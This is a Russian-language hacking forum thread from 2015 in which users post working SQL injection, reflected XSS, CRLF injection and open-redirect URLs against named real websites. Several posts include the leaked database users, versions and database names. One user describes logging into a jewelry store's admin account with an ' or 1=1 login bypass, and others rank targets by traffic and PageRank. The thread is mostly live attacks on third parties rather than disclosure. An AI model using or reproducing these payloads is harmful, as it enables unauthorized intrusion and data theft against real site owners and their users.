Уязвимости SQLi, XSS и другие.

SUHAR1K · 20 Jun 2015

http://www.shkola-smertina.ru/tournaments/?season="><script>alert(100)</script>

Rosso · 20 Jun 2015

Code:

http://www.hafen-fotos.de/keyphoto/viewphoto.php?foto=49200703071515.jpg&userhelp=on&helpid=-86 union select 1,concat(0x3c666f6e7420636f6c6f723d72656420666163653d47656f726769613e,0x3c623e,0x3e3e20496e6a65637420627920526f73736f203c3c,0x3c2f623e3c2f666f6e743e,0x3c62723e,0x557365723a20,user(),0x3c62723e,0x56657273696f6e3a20,version(),0x3c62723e,0x44617461626173653a20,database()),3--+

User: web310@localhost
Version: 5.1.73
Database: usr_web310_1
PR: 3

Code:

http://www.innoworks.org/newinno/bios2.php?staff_id=-64 /*!50000union*/ select 1,concat(0x3c666f6e7420636f6c6f723d72656420666163653d47656f726769613e,0x3c623e,0x3e3e20496e6a65637420627920526f73736f203c3c,0x3c2f623e3c2f666f6e743e,0x3c62723e,0x557365723a20,user(),0x3c62723e,0x56657273696f6e3a20,version(),0x3c62723e,0x44617461626173653a20,database()),3,4,5,6,7,8,9,10,11,12,13,14--+

User: innowork_admin@localhost
Version: 5.5.41-cll-lve
Database: innowork_people
PR: 5

Code:

http://www.arndt-sowi.de/webquest/show.php?id=-40' union select concat(0x3c666f6e7420636f6c6f723d72656420666163653d47656f726769613e,0x3c623e,0x3e3e20496e6a65637420627920526f73736f203c3c,0x3c2f623e3c2f666f6e743e,0x3c62723e,0x557365723a20,user(),0x3c62723e,0x56657273696f6e3a20,version(),0x3c62723e,0x44617461626173653a20,database()),2,3,4,5,6,7,8,9,10,11--+

User: web33@localhost
Version: 5.5.42
Database: usr_web33_2
PR: 3

Code:

http://www.solo-musica.de/show.php?id=-4' union select 1,2,3,concat(0x3c666f6e7420636f6c6f723d72656420666163653d47656f726769613e,0x3c623e,0x3e3e20496e6a65637420627920526f73736f203c3c,0x3c2f623e3c2f666f6e743e,0x3c62723e,0x557365723a20,user(),0x3c62723e,0x56657273696f6e3a20,version(),0x3c62723e,0x44617461626173653a20,database()),5--+

User: [email protected]
Version: 5.1.73-log
Database: db354230028
PR: 3

Code:

http://www.lernort-labor.de/events.show.php?ID=-153 union select 1,2,3,4,5,6,concat(0x3c666f6e7420636f6c6f723d72656420666163653d47656f726769613e,0x3c623e,0x3e3e20496e6a65637420627920526f73736f203c3c,0x3c2f623e3c2f666f6e743e,0x3c62723e,0x557365723a20,user(),0x3c62723e,0x56657273696f6e3a20,version(),0x3c62723e,0x44617461626173653a20,database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+

User: lerjxdou@localhost
Version: 4.1.26
Database: usrdb_lerjxdou
PR: 6

nikonic · 21 Jun 2015

Code:

http://www.leong-leong.com/news.php?id=999999.9+union+all+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5

5.1.72-REL14.10
PR:4

Code:

https://www.naturesplus.com/sourceoflife/products/productDetail.php?id=999999.9+union+all+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3,4,5,6

5.1.70-log
PR:4

Code:

http://pharm.buu.ac.th/News_view.php?id=999999.9'+union+all+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7+and+'0'='0

5.0.45
PR:4

Filipp · 23 Jun 2015

SQL-inj:

Code:

http://bezgazet.dp.ua/?act=mode&mode=0%22%20AND%20%28SELECT%204782%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a707671%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x717a706a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22ClCs%22%3D%22ClCs

nikonic · 23 Jun 2015

Code:

http://www.alternativenergia.hu/wp-content/themes/alternativenergia/tudjmegtobbet.php?catid=85+or+1=9+union+all+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3,4,5,6,7,8--

PR - 5
5.5.35-0+wheezy1-log
вывод в исходном коде

nikonic · 24 Jun 2015

Вкусности-приятности

Code:

http://www.phy.iitkgp.ernet.in/physics/home/faculty/home.php?id=1'+union+all+select+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+and+'0'='0

5.5.41-0
PR-5
Индусы

Code:

http://www.delreyhotel.com/travel.php?id=999999.9%20union%20all%20select%201,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17&ids=7

5.5.42-cll
PR-3

Code:

http://www.sendpoints.cn/newsDetail.php?id=999999.9%20union%20all%20select%201,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12

5.1.65

Code:

http://www.donaldsoneducation.com/store.php?catid=999999.9%20union%20all%20select%201,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4

5.0.96-log
PR-3

Code:

http://www.gunnars.com/product_grids.php?function=indoor'+and(sElEcT+1+fRoM(sElEcT+count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,user(),0x217e21,version(),0x217e21,database()))+fRoM+information_schema.tAbLeS+lImIt+0,1),floor(rand(0)*2))x+fRoM+information_schema.tAbLeS+gRoUp+bY+x)a)+and+'1'='1

5.5.30
PR-5

Code:

http://www.pollackassociates.com/blog/blogbycategory_new.php?catid=(sElEcT+1+fRoM(sElEcT+count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,version(),0x217e21))+fRoM+information_schema.tAbLeS+lImIt+0,1),floor(rand(0)*2))x+fRoM+information_schema.tAbLeS+gRoUp+bY+x)a)

5.5.30
PR-4

Code:

http://www.exboyfriendjewelry.com/listings.php?catid=3'+and(sElEcT+1+fRoM(sElEcT+count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,user(),0x217e21,version(),0x217e21,database()))+fRoM+information_schema.tAbLeS+lImIt+0,1),floor(rand(0)*2))x+fRoM+information_schema.tAbLeS+gRoUp+bY+x)a)+and+'1'='1

Магазин ювелирных изделий
5.5.41-cll-lve
PR-3

semen6192 · 25 Jun 2015

nikonic said: ↑

Вкусности-приятности

Code:

http://www.phy.iitkgp.ernet.in/physics/home/faculty/home.php?id=1'+union+all+select+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+and+'0'='0

5.5.41-0
PR-5
Индусы

Code:

http://www.delreyhotel.com/travel.php?id=999999.9%20union%20all%20select%201,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17&ids=7

5.5.42-cll
PR-3

Code:

http://www.sendpoints.cn/newsDetail.php?id=999999.9%20union%20all%20select%201,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12

5.1.65

Code:

http://www.donaldsoneducation.com/store.php?catid=999999.9%20union%20all%20select%201,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4

5.0.96-log
PR-3

Code:

http://www.gunnars.com/product_grids.php?function=indoor'+and(sElEcT+1+fRoM(sElEcT+count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,user(),0x217e21,version(),0x217e21,database()))+fRoM+information_schema.tAbLeS+lImIt+0,1),floor(rand(0)*2))x+fRoM+information_schema.tAbLeS+gRoUp+bY+x)a)+and+'1'='1

5.5.30
PR-5

Code:

http://www.pollackassociates.com/blog/blogbycategory_new.php?catid=(sElEcT+1+fRoM(sElEcT+count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,version(),0x217e21))+fRoM+information_schema.tAbLeS+lImIt+0,1),floor(rand(0)*2))x+fRoM+information_schema.tAbLeS+gRoUp+bY+x)a)

5.5.30
PR-4

Code:

http://www.exboyfriendjewelry.com/listings.php?catid=3'+and(sElEcT+1+fRoM(sElEcT+count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,user(),0x217e21,version(),0x217e21,database()))+fRoM+information_schema.tAbLeS+lImIt+0,1),floor(rand(0)*2))x+fRoM+information_schema.tAbLeS+gRoUp+bY+x)a)+and+'1'='1

Магазин ювелирных изделий
5.5.41-cll-lve
PR-3

Click to expand...

В магазине ювелирных изделий(http://www.exboyfriendjewelry.com/index.php), в поле входа пользователей, вписал:
user name: ' or 1=1#
password: ' or 1=1 '#
Зашло под ником: Welcome back ExboyfriendJewelry! походу админ, но точно не знаю.

Filipp · 26 Jun 2015

SQL-inj (Blind):

Code:

http://rada.te.ua/poll.php?l=2%20AND%203*2*1%3d6%20AND%20913%3d913

Filipp · 27 Jun 2015

XSS:

Code:

http://www.vsesdelki.lviv.ua/offer-i-id-i-409444-%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.cookie%29%3C/ScRiPt%3E-1-o-2-h-urovnevaja.html

Code:

http://www.admir.rv.ua/ru-i-classifieds-i-category-i-audio-video-foto-tehnika-i-what-i-1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E-i-where-i-%D0%A0%D0%BE%D0%B2%D0%BD%D0%BE-i-p.html

Code:

http://doski.ua/index.php/"><script>alert(document.cookie)</script>

private_static · 27 Jun 2015

Code:

http://www.lizzart.ru/catpg.php?k=1&t=2&id=-1689%20UNION%20ALL%20SELECT%20NULL%2CCURRENT_USER%28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--

[email protected]

Filipp · 30 Jun 2015

XSS:

Code:

http://inforico.com.ua/my/?mq=1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.cookie%29%3C/ScRiPt%3E&st=A

Filipp · 3 Jul 2015

XSS:

Code:

http://don.ua/news/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Filipp · 4 Jul 2015

XSS:

Code:

http://agronews.ru/forums/index.php?ACTION=FORUM_SUBSCRIBE&FID=14%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.cookie%29%3C/ScRiPt%3E&PAGE_NAME=list&sessid=69fa9ea1c1f8fa858cb91f13ece82f69

semen6192 · 4 Jul 2015

XSS:

Code:

http://cvp.cce.cornell.edu/search_results.php?q=%3Cscript%3Ealert%28%27anticat.ru%27%29%3C%2Fscript%3E&x=9&y=9

BigBear · 5 Jul 2015

Ребят, в целях обучения начинающих пентестеров грамотным определениям - ЖЕЛАТЕЛЬНО (если хотите плюсы) указывать полный тип найденной уязвимости - Blind SQL Injection, Reflected XSS, Arbitrary File Downloading и другие.

Спасибо за внимание.

З.Ы. Модерам - прошу закрепить в начале топика.

EoGeneo · 5 Jul 2015

Попробую проканать за пионера

SQL-inj:

Code:

http://www.organicindia.com/article.php?articleid=57+/*!50000union*/+distinct+select+1,2,version(),4,database()--+-

Вывод в конце правой колонки.

----

Code:

http://www.ipicgroup.com/shopping_centre.php?id=-1+/*!50000union*/+distinct+select+1,database(),3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17--+-

nikonic · 5 Jul 2015

Брауновский университет — один из наиболее престижных частных университетов США, расположенный в городе Провиденсе, штата Род-Айленд.Седьмой из старейших национальных университетов и один из девяти колониальных колледжей.
SQL Injection
Code:
http://www.brown.edu/Administration/Auxiliary_Housing/php/show.php?TypeID=999999.9+union+all+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os)
5.0.95-log
PR - 8
ТИц - 800
Alexa:9к
Трафф - 2.6кк в месяц.

Filipp · 6 Jul 2015

CRLF-inj (Результат отображается в heade'ре).
Code:
http://www.notomania.ru/cat_view.php?id=%0d%0a%20SomeCustomInjectedHeader:injected_by_ANTICHAT

semen6192 · 6 Jul 2015

XSS:

Code:

http://friendship-bracelets.net/search.php?search_text=%3Cscript%3Ealert%28%271%27%29%3C%2Fscript%3E

joelblack · 6 Jul 2015

target: clanwilliam.info
type: SQL Injection
current user: `clanwi_1@%`
version: 5.5.43-0+DEB7U1-LOG

Code:

http://www.clanwilliam.info/index.php?id=-1+union+select+1,version(),3,table_name,5,6,7+from+information_schema.tables+limit+0,1+--+;

target: sergiev.ru
type: Open Redirect

Code:

http://www.sergiev.ru/?q=http://ya.ru

Уязвимости SQLi, XSS и другие.

SUHAR1K Reservists Of Antichat

Rosso New Member

nikonic New Member

Filipp Elder - Старейшина

nikonic New Member

nikonic New Member

semen6192 New Member

Filipp Elder - Старейшина

Filipp Elder - Старейшина

private_static Member

Filipp Elder - Старейшина

Filipp Elder - Старейшина

Filipp Elder - Старейшина

semen6192 New Member

BigBear Escrow Service
Staff Member Гарант - Escrow Service

EoGeneo Member

nikonic New Member

Filipp Elder - Старейшина

semen6192 New Member

joelblack Reservists Of Antichat

массовый взлом сайтов

Взлом сайтов

Useful Searches

Уязвимости SQLi, XSS и другие.

SUHAR1K Reservists Of Antichat

Rosso New Member

nikonic New Member

Filipp Elder - Старейшина

nikonic New Member

nikonic New Member

semen6192 New Member

Filipp Elder - Старейшина

Filipp Elder - Старейшина

private_static Member

Filipp Elder - Старейшина

Filipp Elder - Старейшина

Filipp Elder - Старейшина

semen6192 New Member

BigBear Escrow Service Staff Member Гарант - Escrow Service

EoGeneo Member

nikonic New Member

Filipp Elder - Старейшина

semen6192 New Member

joelblack Reservists Of Antichat

массовый взлом сайтов

Взлом сайтов

BigBear Escrow Service
Staff Member Гарант - Escrow Service